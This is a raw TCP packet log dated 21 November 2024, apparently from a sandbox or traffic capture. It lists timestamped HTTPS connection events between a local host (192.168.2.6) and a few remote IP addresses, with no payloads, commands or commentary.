                                                                                                                                                                              Nov 21, 2024 08:30:16.862020016 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:16.862051010 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:16.862097979 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:16.862119913 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:16.862133980 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:16.862160921 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:16.898631096 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:16.898658991 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:16.898822069 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:16.898823023 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:16.898835897 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:16.898902893 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:16.916634083 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:16.916661978 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:16.916716099 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:16.916724920 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:16.916744947 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:16.916773081 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:16.937495947 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:16.937520027 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:16.937593937 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:16.937606096 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:16.937635899 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:16.937654972 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:17.059303999 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:17.059345961 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:17.059454918 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:17.059470892 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:17.059509993 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:17.059524059 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:17.072907925 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:17.072932005 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:17.073021889 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:17.073031902 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:17.073096037 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:17.088232040 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:17.088260889 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:17.088330030 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:17.088339090 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:17.088356018 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:17.088395119 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:17.103513956 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:17.103543043 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:17.103585958 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:17.103595018 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:17.103810072 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:17.103810072 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:17.116488934 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:17.116517067 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:17.116708994 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:17.116708994 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:17.116719007 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:17.116767883 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:17.132707119 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:17.132735014 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:17.132900953 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:17.132900953 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:17.132910967 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:17.132961988 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:17.137130022 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:17.137195110 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:17.137202978 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:17.137217045 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:17.137248039 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:17.137262106 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:17.137301922 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:17.137324095 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:17.137336016 CET49712443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:17.137342930 CET4434971213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:17.175604105 CET49714443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:17.175643921 CET4434971413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:17.175729990 CET49714443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:17.176773071 CET49715443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:17.176887035 CET4434971513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:17.176970005 CET49715443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:17.177799940 CET49716443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:17.177829981 CET4434971613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:17.177923918 CET49716443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:17.178806067 CET49717443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:17.178843021 CET4434971713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:17.178901911 CET49717443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:17.178983927 CET49714443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:17.179003000 CET4434971413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:17.179079056 CET49717443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:17.179100990 CET4434971713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:17.179189920 CET49715443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:17.179219007 CET4434971513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:17.179930925 CET49718443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:17.179945946 CET4434971813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:17.180073977 CET49718443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:17.180073977 CET49716443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:17.180097103 CET4434971613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:17.180196047 CET49718443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:17.180201054 CET4434971813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:17.305458069 CET44349713188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:17.305605888 CET44349713188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:17.305716038 CET49713443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:17.308002949 CET49713443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:17.308036089 CET44349713188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:17.441181898 CET49719443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:17.441226006 CET44349719188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:17.441323996 CET49719443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:17.441612005 CET49719443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:17.441629887 CET44349719188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:17.458895922 CET49720443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:30:17.458939075 CET4434972040.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:17.459048033 CET49720443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:30:17.459654093 CET49720443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:30:17.459670067 CET4434972040.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:18.708421946 CET44349719188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:18.708539963 CET49719443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:18.709852934 CET49719443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:18.709861994 CET44349719188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:18.710197926 CET44349719188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:18.711976051 CET49719443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:18.712148905 CET49719443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:18.712183952 CET44349719188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:18.712249994 CET49719443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:18.759335041 CET44349719188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:18.897110939 CET4434971813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:18.897886992 CET49718443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:18.897905111 CET4434971813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:18.898601055 CET49718443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:18.898606062 CET4434971813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:18.958456993 CET4434971613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:18.959002972 CET49716443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:18.959028006 CET4434971613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:18.959469080 CET49716443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:18.959474087 CET4434971613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:18.961478949 CET4434971413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:18.961726904 CET49714443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:18.961759090 CET4434971413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:18.962096930 CET49714443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:18.962105989 CET4434971413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:18.963159084 CET4434971713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:18.963393927 CET49717443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:18.963438034 CET4434971713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:18.963725090 CET49717443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:18.963730097 CET4434971713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.024399996 CET4434971513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.025966883 CET49715443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:19.026050091 CET4434971513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.026434898 CET49715443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:19.026451111 CET4434971513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.271400928 CET4434972040.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.271512032 CET49720443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:30:19.274117947 CET49720443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:30:19.274132967 CET4434972040.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.274475098 CET4434972040.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.276504040 CET49720443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:30:19.276576996 CET49720443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:30:19.276587009 CET4434972040.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.276726961 CET49720443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:30:19.319339991 CET4434972040.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.339034081 CET4434971813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.339104891 CET4434971813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.339173079 CET49718443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:19.339184046 CET4434971813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.339659929 CET49718443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:19.339659929 CET49718443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:19.339668036 CET4434971813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.339766026 CET4434971813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.343966007 CET49721443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:19.344017029 CET4434972113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.344075918 CET49721443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:19.344243050 CET49721443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:19.344259024 CET4434972113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.405482054 CET4434971413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.405503035 CET4434971413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.405685902 CET49714443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:19.405709028 CET4434971413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.405759096 CET49714443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:19.405831099 CET49714443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:19.405838013 CET4434971413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.405858040 CET49714443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:19.406008959 CET4434971413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.406035900 CET4434971413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.406079054 CET49714443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:19.408112049 CET4434971613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.408128977 CET4434971613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.408221006 CET49716443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:19.408231020 CET4434971613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.408322096 CET49716443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:19.408418894 CET49716443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:19.408418894 CET49716443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:19.408427000 CET4434971613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.408576965 CET4434971613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.408592939 CET49722443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:19.408601046 CET4434971613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.408641100 CET4434972213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.408668041 CET49716443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:19.408701897 CET49722443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:19.408838034 CET49722443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:19.408845901 CET4434972213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.410331011 CET49723443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:19.410351038 CET4434972313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.410417080 CET49723443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:19.410523891 CET49723443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:19.410535097 CET4434972313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.411545038 CET4434971713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.411607027 CET4434971713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.411663055 CET49717443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:19.411742926 CET49717443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:19.411742926 CET49717443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:19.411783934 CET4434971713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.411811113 CET4434971713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.413485050 CET49724443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:19.413510084 CET4434972413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.413594007 CET49724443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:19.413681984 CET49724443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:19.413706064 CET4434972413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.548304081 CET4434971513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.548402071 CET4434971513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.548460960 CET49715443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:19.548641920 CET49715443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:19.548680067 CET4434971513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.548707962 CET49715443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:19.548723936 CET4434971513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.551182985 CET49725443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:19.551223040 CET4434972513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.551299095 CET49725443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:19.551457882 CET49725443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:19.551471949 CET4434972513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.676110029 CET4434972040.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.676209927 CET4434972040.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.676316023 CET49720443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:30:19.676388979 CET49720443192.168.2.640.113.110.67
                                                                                                                                                                              Nov 21, 2024 08:30:19.676405907 CET4434972040.113.110.67192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.685499907 CET44349719188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.685631990 CET44349719188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.685687065 CET49719443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:19.688500881 CET49719443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:19.688519955 CET44349719188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.912796974 CET49726443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:19.912837982 CET44349726188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:19.912993908 CET49726443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:19.913286924 CET49726443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:19.913297892 CET44349726188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:21.168054104 CET4434972313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:21.168303967 CET4434972213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:21.168744087 CET49723443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:21.168778896 CET4434972313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:21.168864012 CET49722443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:21.168891907 CET4434972213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:21.169291973 CET49723443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:21.169300079 CET4434972313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:21.169380903 CET49722443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:21.169387102 CET4434972213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:21.210025072 CET4434972413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:21.210587025 CET49724443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:21.210597038 CET4434972413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:21.210982084 CET49724443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:21.210988045 CET4434972413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:21.219737053 CET44349726188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:21.219847918 CET49726443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:21.221015930 CET49726443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:21.221023083 CET44349726188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:21.221371889 CET44349726188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:21.222621918 CET49726443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:21.222722054 CET49726443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:21.222753048 CET44349726188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:21.222836971 CET49726443192.168.2.6188.114.96.3
                                                                                                                                                                              Nov 21, 2024 08:30:21.222843885 CET44349726188.114.96.3192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:21.235459089 CET4434972113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:21.236140013 CET49721443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:21.236155033 CET4434972113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:21.236608028 CET49721443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:21.236614943 CET4434972113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:21.337173939 CET4434972513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:21.337955952 CET49725443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:21.337976933 CET4434972513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:21.338579893 CET49725443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:21.338587046 CET4434972513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:21.603410959 CET4434972313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:21.603566885 CET4434972313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:21.603651047 CET49723443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:21.603873968 CET49723443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:21.603893042 CET4434972313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:21.603903055 CET49723443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:21.603909016 CET4434972313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:21.603935003 CET4434972213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:21.603996038 CET4434972213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:21.604043007 CET49722443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:21.604190111 CET49722443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:21.604211092 CET4434972213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:21.604223013 CET49722443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:21.604229927 CET4434972213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:21.606906891 CET49727443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:21.606939077 CET4434972713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:21.606957912 CET49728443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:21.606966019 CET4434972813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:21.607001066 CET49727443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:21.607033968 CET49728443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:21.607180119 CET49727443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:21.607187986 CET4434972713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:21.607218027 CET49728443192.168.2.613.107.246.45
